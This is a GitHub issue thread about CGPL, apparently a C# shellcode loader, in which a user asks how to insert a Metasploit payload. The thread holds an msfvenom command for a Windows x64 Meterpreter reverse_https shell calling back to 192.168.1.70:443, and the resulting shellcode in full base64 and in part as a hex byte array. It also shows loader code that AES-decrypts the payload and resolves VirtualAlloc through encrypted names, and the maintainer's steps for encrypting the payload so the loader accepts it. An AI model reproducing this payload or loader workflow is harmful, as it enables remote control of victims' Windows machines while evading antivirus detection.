### ISSUE TITLE
The input data is not a complete block.

### ISSUE THREAD

**Issue by johnjohnsp1** [oldboy21/CGPL#1]
hi,
actually i do
msfvenom --platform windows --arch x64  -p windows/x64/meterpreter/reverse_https LHOST=192.168.1.70 LPORT=443 -f raw -o test.bin
--
cat test.bin | base64 -w0
/EiD5PDozAAAAEFRQVBSUUgx0mVIi1JgSItSGEiLUiBWTTHJSA+3SkpIi3JQSDHArDxhfAIsIEHByQ1BAcHi7VJIi1Igi0I8QVFIAdBmgXgYCwIPhXIAAACLgIgAAABIhcB0Z0gB0FBEi0AgSQHQi0gY41ZNMclI/8lBizSISAHWSDHArEHByQ1BAcE44HXxTANMJAhFOdF12FhEi0AkSQHQZkGLDEhEi0AcSQHQQYsEiEFYQVheWUgB0FpBWEFZQVpIg+wgQVL/4FhBWVpIixLpS////11IMdtTSb53aW5pbmV0AEFWSInhScfCTHcmB//VU1NIieFTWk0xwE0xyVNTSbo6VnmnAAAAAP/V6A0AAAAxOTIuMTY4LjEuNzAAWkiJwUnHwLsBAABNMclTU2oDU0m6V4mfxgAAAAD/1ejuAAAAL3ktUmVHN0hBS3FMc09lMDdqOFUxS0F5VE1oMzZYM0xha1h0MnFPNVhlMGZRalZKSTMtTi1LSEp2UkgwcTlyZGJxcHZHSnR1YWZKdzBqYjJxanp4UVRULVMwSGFCTGFlUnpQdnFiSXV0azhEWVZrQ0M2LXlDaUh3U2UzZmpoUVJrOGp4YmM5RnpUaGh4WHZpVDhyZXk4X2Q4R2ZBZUNRZkdJVU8wOHFwOWlHR1pTNjI0U3dTaUhjaGJ2RFFCVV9IYXp2dVNzUzVCYjdZS1pEcGU0MXQ3Tjl4dlR3aWJEQmZOc0laZUlISWlfWVlhAEiJwVNaQVhNMclTSLgAMqiEAAAAAFBTU0nHwutVLjv/1UiJxmoKX0iJ8WofWlJogDMAAEmJ4GoEQVlJunVGnoYAAAAA/9VNMcBTWkiJ8U0xyU0xyVNTScfCLQYYe//VhcB1H0jHwYgTAABJukTwNeAAAAAA/9VI/890Auuq6FUAAABTWWpAWkmJ0cHiEEnHwAAQAABJulikU+UAAAAA/9VIk1NTSInnSInxSInaScfAACAAAEmJ+Um6EpaJ4gAAAAD/1UiDxCCFwHSyZosHSAHDhcB10ljDWGoAWUnHwvC1olb/1Q==

then copy this base64 string at line 548 of Program.cs code:

  static void Main(string[] args)
        {
            string key = "CiaoGrande";
            byte[] keyAes = GetSha256(key);

 
            string ciaogrande = "/EiD5PDozAAAAEFRQVBSUUgx0mVIi1JgSItSGEiLUiBWTTHJSA+3SkpIi3JQSDHArDxhfAIsIEHByQ1BAcHi7VJIi1Igi0I8QVFIAdBmgXgYCwIPhXIAAACLgIgAAABIhcB0Z0gB0FBEi0AgSQHQi0gY41ZNMclI/8lBizSISAHWSDHArEHByQ1BAcE44HXxTANMJAhFOdF12FhEi0AkSQHQZkGLDEhEi0AcSQHQQYsEiEFYQVheWUgB0FpBWEFZQVpIg+wgQVL/4FhBWVpIixLpS////11IMdtTSb53aW5pbmV0AEFWSInhScfCTHcmB//VU1NIieFTWk0xwE0xyVNTSbo6VnmnAAAAAP/V6A0AAAAxOTIuMTY4LjEuNzAAWkiJwUnHwLsBAABNMclTU2oDU0m6V4mfxgAAAAD/1ejuAAAAL3ktUmVHN0hBS3FMc09lMDdqOFUxS0F5VE1oMzZYM0xha1h0MnFPNVhlMGZRalZKSTMtTi1LSEp2UkgwcTlyZGJxcHZHSnR1YWZKdzBqYjJxanp4UVRULVMwSGFCTGFlUnpQdnFiSXV0azhEWVZrQ0M2LXlDaUh3U2UzZmpoUVJrOGp4YmM5RnpUaGh4WHZpVDhyZXk4X2Q4R2ZBZUNRZkdJVU8wOHFwOWlHR1pTNjI0U3dTaUhjaGJ2RFFCVV9IYXp2dVNzUzVCYjdZS1pEcGU0MXQ3Tjl4dlR3aWJEQmZOc0laZUlISWlfWVlhAEiJwVNaQVhNMclTSLgAMqiEAAAAAFBTU0nHwutVLjv/1UiJxmoKX0iJ8WofWlJogDMAAEmJ4GoEQVlJunVGnoYAAAAA/9VNMcBTWkiJ8U0xyU0xyVNTScfCLQYYe//VhcB1H0jHwYgTAABJukTwNeAAAAAA/9VI/890Auuq6FUAAABTWWpAWkmJ0cHiEEnHwAAQAABJulikU+UAAAAA/9VIk1NTSInnSInxSInaScfAACAAAEmJ+Um6EpaJ4gAAAAD/1UiDxCCFwHSyZosHSAHDhcB10ljDWGoAWUnHwvC1olb/1Q==";
            byte[] buf = Convert.FromBase64String(AesOperation.DecryptString(keyAes,ciaogrande));
            int bufSize = buf.Length;
            uint oldprotect = 0;
            IntPtr VirtualAllocPtr = CiaoGrandeRetrieve(AesOperation.DecryptString(keyAes, "pd6O/2VjBB0VTrEjz216gw=="), AesOperation.DecryptString(keyAes, "pYGzDGbPbfEg8fUiOr9A0Q=="));
            
or iam wrong ?

thanks

**Comment by oldboy21** [comment]
You need to encrypt the base64 string first, the AesOperation.cs class also implements the encrypt() function. 
Once the string is encrypted you can pass it as payload

**Comment by johnjohnsp1** [comment]
im still confused, sorry , to encrypt the base64 string you mean modify the AesOperation.cs like this ?

using System;
using System.IO;
using System.Security.Cryptography;


namespace CGPL
{
    public class AesOperation
    {
        public static string EncryptString(byte[] key, string plainText)
        {
            byte[] iv = new byte[617] {0xfc,0x48,0x83,0xe4,0xf0,0xe8,
0xcc,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,0x48,0x31,0xd2,
0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,0x8b,0x52,
0x20,0x51,0x56,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,
0x8b,0x72,0x50,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,
0x20,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0xe2,0xed,0x52,0x41,
0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,0x01,0xd0,0x66,
0x81,0x78,0x18,0x0b,0x02,0x0f,0x85,0x72,0x00,0x00,0x00,0x8b,
0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,
0xd0,0x8b,0x48,0x18,0x44,0x8b,0x40,0x20,0x50,0x49,0x01,0xd0,
0xe3,0x56,0x48,0xff,0xc9,0x4d,0x31,0xc9,0x41,0x8b,0x34,0x88,
0x48,0x01,0xd6,0x48,0x31,0xc0,0x41,0xc1,0xc9,0x0d,0xac,0x41,
0x01,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c,0x24,0x08,0x45,
0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,
0x66,0x41,0x8b,0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,
0x41,0x8b,0x04,0x88,0x41,0x58,0x41,0x58,0x5e,0x48,0x01,0xd0,

then recompile it ?

**Comment by oldboy21** [comment]
You do not need to modify the code. You need to generate your payload from metasploit, as showed in the README. Then base64 encode the payload. Once you have done that you call in the main function of Program.cs the AesOperation.Encrypt() function passing as input your base64 (not yet encrypted) payload. That string can then be used as payload. You can use any other encryptor as long as it's AES with the same key.

**Comment by johnjohnsp1** [comment]
Ti ringrazio del suggerimento.
non essendo pratico di programmazione mi ci vorra un po di tempo per applicare quello che mi hai detto.
ciao
luca

**Comment by johnjohnsp1** [comment]
you mean console.writeline like this ?
            Console.WriteLine(buf.ToString());

tried that but i just can see System.byte[]
any suggestion please ?
